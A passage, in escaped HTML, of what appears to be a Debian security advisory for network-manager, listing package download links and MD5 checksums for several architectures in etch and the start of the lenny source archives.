&lt;br&gt;&lt;br&gt;alpha architecture (DEC Alpha)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 381334 d0fa566c6157cc9590fc4ac343494c06
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112752 eaccaea2845fbf15eb7785aea488ae23
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 259300 2cba0b7225cb0bf54a213b629f8e549c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 119400 ac8ae428f79e0643730d648fa785038b
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 127538 1f191e99e963f25791b788933f92fe67
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 121702 e00aff6a1ce0de6fde754f8f26bd56cf
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 136174 4fb472c760ecb83864912cd403d6d68b
&lt;br&gt;&lt;br&gt;amd64 architecture (AMD x86_64 (AMD64))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 377714 346447be8036a69f83dc33f33086535d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118648 242e933e9b2a4a217c26ba938dfec496
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 127308 c98926309bc01886ea1e617b0ddd234c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 124268 f924645be9b503ad97bc66abeb9a0250
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 247392 faca3961e48d3ccb07334e741aec10df
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 111986 9c6fe9dbc9d2185eb702d6ff47398fe7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118352 07be7293e380f38897fdfb3b0d693021
&lt;br&gt;&lt;br&gt;hppa architecture (HP PA RISC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 130832 22aa006ddb311666af1b41e63ec17fd4
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112826 d4e444ea04ccc770444a6426b792b3c6
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 125866 fea8d5b15a0c2a94000c0d9b8987499c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 120276 372238091d3ab15325f5ad8fee84efd5
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 376960 860f031ba177fad3524dfbb20118e550
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 254374 1835e8ff4f393d3554b566436a2fea57
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 119536 48e2418b0280423b2e9f69e95b37d643
&lt;br&gt;&lt;br&gt;i386 architecture (Intel ia32)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 126232 e00655f007c778143f3b33eb2618cf2a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118530 d38c510c9e0094529575917272e74b72
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 123882 2c641df7d5ab4f100778795dce5ab9bb
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 239640 2f6c0940ac4e34ba3aea0c8cbf76cf60
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118136 f2bae719f42c8a30dcd3b7e8004b8d58
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112858 1e07c7c7318b89b08f443fcc2fcc4ed1
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 371748 e925bac52eb8fad1bcdf7e14f6dbbc1e
&lt;br&gt;&lt;br&gt;ia64 architecture (Intel ia64)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 305500 e779cdb25338cd8dc21525022b22768e
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 407794 6a16b5e4e8563fbad6bd6890bdd7a123
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 122722 fdcf975b50ed49f4ee37f9f994b94c97
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 130812 ccae0fa400747a22e3124b8223df51bb
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112786 f035e38ad68cf43e32c626d50d781982
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 122246 6fe88cd1556e1c00755d4509b69f2a52
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 136392 21529694edab05b38f0a3613768d3509
&lt;br&gt;&lt;br&gt;mips architecture (MIPS (Big Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 120050 311d3c58e470683d003a764b8cd0f245
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 124602 6534f02f08d137f6e050aa86026b46fd
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 239920 47d8290298850e325301c7d1ef97048b
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112790 639962b84ef0f74825f81c0eda9cbbbb
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 131648 fd2e9dc863a688705ea03e47ca55c9fa
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 370762 2e777acfce2d882f54ef92082ea34f09
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118374 c784f17c138aa7b86454449fe9021dcc
&lt;br&gt;&lt;br&gt;powerpc architecture (PowerPC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 125372 2edfcaec1df4a4e03b4653aff3012329
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 119820 eb0b1dae1c13fa662708ef7391f70266
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112786 946de4230810730fc422b4170779bb38
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 368504 c9b07a65e97306f92b70d5ad030b2c5a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 128568 278e2b2cc57991607b9bbf71eeec3a61
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 119290 8259e2adda573211e8a0b85c0752a668
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 242784 6fe6a79309ee3c4d95d9b1da16b78ecd
&lt;br&gt;&lt;br&gt;sparc architecture (Sun SPARC/UltraSPARC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 128288 319084680439c80a2817f3f8606935ac
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118792 a697368a598ad353b8bb00930f5a2c1c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112580 717a8ab6f698873851a5dc586d9000d3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 234136 05f09b3f9c4dfaab27217a1ca5f7ee4a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118152 abd8acdd835d5d52c1d200c5d6d4f1e7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 369282 40598f43075951ceb3a2af2dbafcda2c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 124676 9ea075e2ca00fad4d1d390cd23ee847a
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 5.0 alias lenny
&lt;br&gt;- --------------------------------
&lt;br&gt;&lt;br&gt;Debian (stable)
&lt;br&gt;- ---------------
&lt;br&gt;&lt;br&gt;Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6-4+lenny1.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6-4+lenny1.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 1734 34200f4387757a3688c49c617bc09fc6
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6-4+lenny1.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6-4+lenny1.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 8437 d5c7910fc754ef45eb7628f41e98023f
